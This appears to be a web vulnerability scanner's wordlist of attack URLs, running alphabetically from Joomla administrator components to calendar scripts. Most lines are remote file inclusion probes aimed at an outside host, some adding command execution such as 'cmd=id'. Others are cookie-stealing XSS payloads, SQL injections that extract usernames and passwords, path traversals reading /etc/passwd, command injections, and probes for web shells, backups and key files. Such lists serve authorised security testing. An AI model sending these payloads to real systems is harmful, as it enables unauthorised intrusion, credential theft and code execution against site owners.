administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://www.yxlink.com/nvs_test.txt
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yxlink.com/nvs_test.txt
administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_events/admin.events.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path= http://www.yxlink.com/nvs_test.txt
administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_jreactions/langset.php?comPath=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt?
administrator/gallery/gallery.php?directory=\x5C\x22<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\x5C\x22<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php?directory=\x5C\x22<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\x5C\x22<script>alert(document.cookie)</script>
administrator/index2.php?PHPSESSID=1&myname=admin&full \x5Cnname=admin&userid=administrator
administrator/menu_add.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/menu_operation.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/phpinfo.php
administrator/popups/sectionswindow.php?type=web&link=\x5C\x22<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\x5C\x22<script>alert(document.cookie)</script>
administrivia
adminlogin/
adminpanel
adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://www.yxlink.com/nvs_test.txt
adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://www.yxlink.com/nvs_test.txt?
admins
adodb/adodb-errorpear.inc.php?ourlinux_root_path=http://www.yxlink.com/nvs_test.txt
adodb/adodb-pear.inc.php?ourlinux_root_path=http://www.yxlink.com/nvs_test.txt
adodb/adodb.inc.php?path=http://www.yxlink.com/nvs_test.txt
adovbs.inc
ads
adv_cat.php?cat_id=4\x22><script>alert(2222)</script>&razd_id=45\x22><script>alert(2222)</script>
advanced_comment_system/admin.php?ACS_path=http://www.yxlink.com/nvs_test.txt?
advanced_comment_system/index.php?ACS_path=http://www.yxlink.com/nvs_test.txt?
advanced_search_result.php?keywords=/>\x22<script>alert(15)</script>&x=1&y=1
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.yxlink.com/nvs_test.txt
affich.php?image=<script>alert(document.cookie)</script>
agenda.php3?rootagenda=http://www.yxlink.com/nvs_test.txt
agenda2.php3?rootagenda=http://www.yxlink.com/nvs_test.txt
aguai.php
aguai1.php
aguai123.php
aides/index.php?page=http://www.yxlink.com/nvs_test.txt?
ains_main.php?ains_path=http://www.yxlink.com/nvs_test.txt
ainstall
ajax.php
ajax.php?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
ajax.php?rs=__exp__getFeedContent&amp;rsargs[]=-99 UNION SELECT concat(char(58),md5(333),char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*
ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a,md5(333),0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23
ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/boot.ini
ajax/loadsplash.php?full_path=http://www.yxlink.com/nvs_test.txt
ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>
ajouter.php?include=http://www.yxlink.com/nvs_test.txt?
akarru.gui/main_content.php?bm_content=http://www.yxlink.com/nvs_test.txt
akocomments.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
albumdetail.php?albumid=-31+union/**/select/**/1,md5(333),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
albums.php?action=editimage&image=[Vaild_ID]&album=2'
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
amazon/cart.php?cmd=add&asin=http://www.yxlink.com/nvs_test.txt
amazon/index.php?lang=http://www.yxlink.com/nvs_test.txt
amazon/info.php?asin=http://www.yxlink.com/nvs_test.txt
amcharts
amcharts/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
amcharts/flash/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
amcolumn
amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
amcolumn/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
amcolumn/examples/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
ampache/docs/README
ampache/login.php
ampache/update.php
annonce.php?page=http://www.yxlink.com/nvs_test.txt
annonce.php?page=http://www.yxlink.com/nvs_test.txt?&cmd=id
announcements.php?phpraid_dir=http://www.yxlink.com/nvs_test.txt
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
anzagien.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?cmd=id
apbn/templates/head.php?APB_SETTINGS[template_path]=http://www.yxlink.com/nvs_test.txt
apc.php
api
api.aspx
api.jsp
api.php
api.php?action=File&ctrl=download&path=config.php
api.php?api_script=http://www.yxlink.com/nvs_test.txt
api.php?c=api&f=phpok&id=_project&param[pid]=1/**/UNION/**/SELECT/**/1,concat(md5(333),0x7e,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
api.php?op=add_favorite&url=wooyun.in&title=%2527
api.php?op=get_linkage&act=ajax_getlist&callback=<body onload=alert(1)>
api.php?op=get_menu&act=ajax_getlist&callback=Yxlink&parentid=0&key=authkey&cachefile=..%5C..%5C..%5Cphpsso_server%5Ccaches%5Ccaches_admin%5Ccaches_data%5Capplist&path=admin
api.php?t_path_core=http://www.yxlink.com/nvs_test.txt?&cmd=id
api/call.php?action=query&num=j8g'%29/**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x4E56535F544553547E,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23
api/trade/notify_credit.php?attach=tenpay&retcode=0&mch_vno=%2527
app.js
app/Default.aspx%20
app/config/database.yml
app/config/database.yml.pgsql
app/config/database.yml.sqlite3
app/config/database.yml_original
app/config/database.yml~
application.php?base_path=http://www.yxlink.com/nvs_test.txt
application.wadl
application/configs/application.ini
applications/applications.jsf?');};alert(222);</script><!--
apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15
apps
apps/apps.php?app=http://www.yxlink.com/nvs_test.txt
apps/groups/index.php?route=groups&basePath=http://www.yxlink.com/nvs_test.txt
apps/groups/index.php?route=groups&basePath=http://www.yxlink.com/nvs_test.txt%00
apps/share/index.php?route=groups&basePath==http://www.yxlink.com/nvs_test.txt
apps/share/index.php?route=groups&basePath==http://www.yxlink.com/nvs_test.txt%00
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
appserv/main.php?appserv_root=http://www.yxlink.com/nvs_test.txt
appveyor.yml
aq.php
arab3upload/customize.php?path=http://www.yxlink.com/nvs_test.txt?&cmd=pwd
arab3upload/initialize.php?path=http://www.yxlink.com/nvs_test.txt?&cmd=pwd
arash_lib/class/arash_gadmin.class.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
arash_lib/class/arash_sadmin.class.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
arash_lib/include/edit.inc.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
arash_lib/include/list_features.inc.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
archive.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
archives
aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://www.yxlink.com/nvs_test.txt%00
article.cfm?id=1'<script>alert(document.cookie);</script>
article.php?act=list&catid=0&keyword=1%d5'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,hex(323232323232323232),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
article.php?article=4965&post=1111111111
article.php?sid=\x5C\x22><Img Src=javascript:alert('Vulnerable')><Img Src=\x5C\x22
article/file/cid/1136/?file=../../../../application/config/config.ini.php
article_js.asp?OrderField=Hits%20UNION%20SELECT%201,2,3,4,88888888-1,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin%20order%20by%201
artlist.php?root_path=http://www.yxlink.com/nvs_test.txt
ashnews.php?pathtoashnews=http://www.yxlink.com/nvs_test.txt
ask/search.aspx?type=%27%20and%201=str(123.4,8,4)%20and%201=%271&word=
asp.php
asp/SQLQHit.asp
asp/sqlqhit.asp
aspnet
aspx.php
aspxspy.aspx
aspxspy.php
assets
assets/components/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
assets/fckeditor
assets/flash/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
assets/js/Jplayer.swf?jQuery=alert&id=XSS
assets/js/fckeditor
assets/js/jplayer/Jplayer.swf?jQuery=alert&id=XSS
assets/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.yxlink.com/nvs_test.txt
assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.yxlink.com/nvs_test.txt?cmd
assets/scripts/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yxlink.com/nvs_test.txt?
assets/swf/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
athena.php?athena_dir=http://www.yxlink.com/nvs_test.txt
athenareg.php?pass=%20;cat%20/etc/passwd
atom
attachments
auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
auction/auction_common.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
auction/includes/converter.inc.php?include_path=http://www.yxlink.com/nvs_test.txt?
auction/includes/messages.inc.php?include_path=http://www.yxlink.com/nvs_test.txt?
auction/includes/settings.inc.php?include_path=http://www.yxlink.com/nvs_test.txt?
auction/phpAdsNew/view.inc.php?phpAds_path=http://www.yxlink.com/nvs_test.txt
audio
audit-policy.jsp?maxTotalSize=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&update=Save%20Settings
auth
auth.cookie.inc.php?da_path=http://www.yxlink.com/nvs_test.txt
auth.header.inc.php?da_path=http://www.yxlink.com/nvs_test.txt
auth.sessions.inc.php?da_path=http://www.yxlink.com/nvs_test.txt
auth/auth.php?phpbb_root_path=@RFIUR
auth/auth.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
auth/auth.php?smf_root_path=http://www.yxlink.com/nvs_test.txt
auth/auth_SMF/smf_root_path=http://www.yxlink.com/nvs_test.txt
auth/auth_phpbb/phpbb_root_path=http://www.yxlink.com/nvs_test.txt
auth_user_file.txt
authenticate.php?default_path_for_themes=http://www.yxlink.com/nvs_test.txt
authenticate.php?default_path_for_themes=http://www.yxlink.com/nvs_test.txt?
authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.yxlink.com/nvs_test.txt
authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.yxlink.com/nvs_test.txt
authorized_keys
auto_check_renewals.php?installed_config_file=http://www.yxlink.com/nvs_test.txt?cmd=ls
autogetarticle/_GetLockPic.php?p=/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
autoindex.php?cfg_file=http://www.yxlink.com/nvs_test.txt?
awstats.pl
awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)//
awstats/
awstats/awstats.pl
awzmb/adminhelp.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/admin.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/help.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/reg.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
axis/services/listServices
axis1/services/listServices
axis2
axis2/services/listServices
axoverzicht.cgi?maand=http://www.yxlink.com/nvs_test.txt
b
b.php
b2-include/b2edit.showposts.php?b2inc=http://www.yxlink.com/nvs_test.txt&cmd=ls
b2-tools/gm-2-b2.php?b2inc= http://www.yxlink.com/nvs_test.txt
b2-tools/gm-2-b2.php?b2inc=http://www.yxlink.com/nvs_test.txt
b2verifauth.php?index=http://www.yxlink.com/nvs_test.txt?
bac
backdoor v1.0.php
backend/addons/links/index.php?PATH=http://www.yxlink.com/nvs_test.txt
backup
backup-img.7z
backup-img.rar
backup-img.sql
backup-img.sql.gz
backup-img.sql.tar
backup-img.tar
backup-img.tar.gz
backup-img.zip
backup.7z
backup.rar
backup.sql
backup.sql.gz
backup.sql.tar
backup.tar
backup.tar.gz
backup.zip
backup/
backup_img.7z
backup_img.rar
backup_img.sql
backup_img.sql.gz
backup_img.sql.tar
backup_img.tar
backup_img.tar.gz
backup_img.zip
backupimg.7z
backupimg.rar
backupimg.sql
backupimg.sql.gz
backupimg.sql.tar
backupimg.tar
backupimg.tar.gz
backupimg.zip
backups
baike/style/default/admin/open.gif
bak
bak/
banner
banners
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
base
basebuilder/src/main.inc.php?mj_config[src_path]=http://www.yxlink.com/nvs_test.txt???
batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,md5(333),0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
bb000001.pl<script>alert('Vulnerable')</script>
bb_admin.php?includeFooter=http://www.yxlink.com/nvs_test.txt
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28md5(333),0x27,md5(444)%29%20from%20information_schema.SCHEMATA%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
bc4j.html
beacon/language/1/splash.lang.php?languagePath=http://www.yxlink.com/nvs_test.txt
beheer/
belegungsplan/jahresuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
belegungsplan/monatsuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
belegungsplan/tagesuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
belegungsplan/wochenuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
bemarket/postscript/postscript.php?p_mode=http://www.yxlink.com/nvs_test.txt
benjurry.jsp%81
beta
betsie/parserl.pl/<script>alert('Vulnerable')</script>;
biblioteca/bib_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_pldetails.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_plform.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_plsearchc.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_plsearchs.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_searchc.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_searchs.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/edi_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/edi_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/gen_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/gen_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/lin_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/lin_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/luo_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/luo_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/sog_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/sog_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://www.yxlink.com/nvs_test.txt
bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://www.yxlink.com/nvs_test.txt?
bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://www.yxlink.com/nvs_test.txt?
bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.yxlink.com/nvs_test.txt?
bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.yxlink.com/nvs_test.txt?
bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
bigdump.php
bigdump.php?start=\x22><script>alert(333)</script>
bild.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
billing
billing/billing.apw
bin
bin/qte_init.php?qte_root=http://www.yxlink.com/nvs_test.txt?
bingoserver.php3?response_dir=http://www.yxlink.com/nvs_test.txt
black.php
blah-whatever-badfile.jsp
blah-whatever.jsp
blah123.php
block.php?Include=http://www.yxlink.com/nvs_test.txt
blocks/birthday.php?full_path=http://www.yxlink.com/nvs_test.txt
blocks/events.php?full_path=http://www.yxlink.com/nvs_test.txt
blocks/help.php?full_path=http://www.yxlink.com/nvs_test.txt
blog/fckeditor
blog/mt-check.cgi
blog/mt.cfg
blogcms/admin/media.php?DIR_LIBS=http://www.yxlink.com/nvs_test.txt?
blogcms/admin/xmlrpc/server.php?DIR_LIBS=http://www.yxlink.com/nvs_test.txt?
blogcms/index.php?DIR_PLUGINS=http://www.yxlink.com/nvs_test.txt?
blogs
bmzh.php
board.php?FID=2%27
board/post.php?qb_path=http://www.yxlink.com/nvs_test.txt
boardhelp.asp?boardid=0&act=2&title=\x22><script>alert(333)</script>
boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,md5(333),0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
boitenews4/index.php?url_index=http://www.yxlink.com/nvs_test.txt?
bom.php
book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
book/index.php?c=search&catid=(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
books/allbooks.php?home=http://www.yxlink.com/nvs_test.txt
books/home.php?home=http://www.yxlink.com/nvs_test.txt
books/mybooks.php?home=http://www.yxlink.com/nvs_test.txt
bottom.html
bower.json
bp_ncom.php?bnrep=http://www.yxlink.com/nvs_test.txt
bp_news.php?bnrep=http://www.yxlink.com/nvs_test.txt
bridge/enigma/E2_header.inc.php?boarddir=http://www.yxlink.com/nvs_test.txt?
bridge/yabbse.inc.php?sourcedir=http://www.yxlink.com/nvs_test.txt
bridges/SMF/logout.php?path_to_smf=http://www.yxlink.com/nvs_test.txt
browse
browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(md5(333),0x3a,admin_password),2,3+from+se_admins
bu/bu_cache.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
bu/bu_claro.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
bu/bu_parse.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
bu/process.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
buddy.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
bugs
bugs/bug.php?op=viewvotes&bugid=1 union select 1,md5(333),3 \x5C where user_id='2'/*
bugs/forgot_password.php?email=\x5C\x22><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\x5C\x22><script>alert(document.cookie)</script>
build
builddb.php?env_dir=http://www.yxlink.com/nvs_test.txt
button/settings_sql.php?path=http://www.yxlink.com/nvs_test.txt
c
c-h.v2.php
c.php
c/winnt/system32/cmd.exe?/c+dir+/OG
c99.php
c99shell.php
ca000001.pl?ACTION=SHOWCART&hop=\x5C\x22><script>alert('Vulnerable')</script>&PATH=acatalog%2f
ca000007.pl?ACTION=SHOWCART&REFPAGE=\x5C\x22><script>alert('Vulnerable')</script>
cache
cache_html
cacti/graph.php?local_graph_id=1&rra_id=34&action=properties&view_type=token'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://www.yxlink.com/nvs_test.txt?
cal.func.php?dir_edge_lang=http://www.yxlink.com/nvs_test.txt
calcul-page.php?home=http://www.yxlink.com/nvs_test.txt
calendar.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt> \x5Cr\x5Cnhttp://127.0.0.1/upload/faq.php?a
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.php?cfg_dir=http://www.yxlink.com/nvs_test.txt?
calendar.php?lang=http://www.yxlink.com/nvs_test.txt
calendar.php?path_to_calendar=http://www.yxlink.com/nvs_test.txt
calendar.php?vwar_root=http://www.yxlink.com/nvs_test.txt
calendar.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
calendar/demo/index.php?date=&v=http://www.yxlink.com/nvs_test.txt?
calendar/payment.php?insPath=http://www.yxlink.com/nvs_test.txt
calendar_admin.pl?config=|cat%20/etc/passwd|
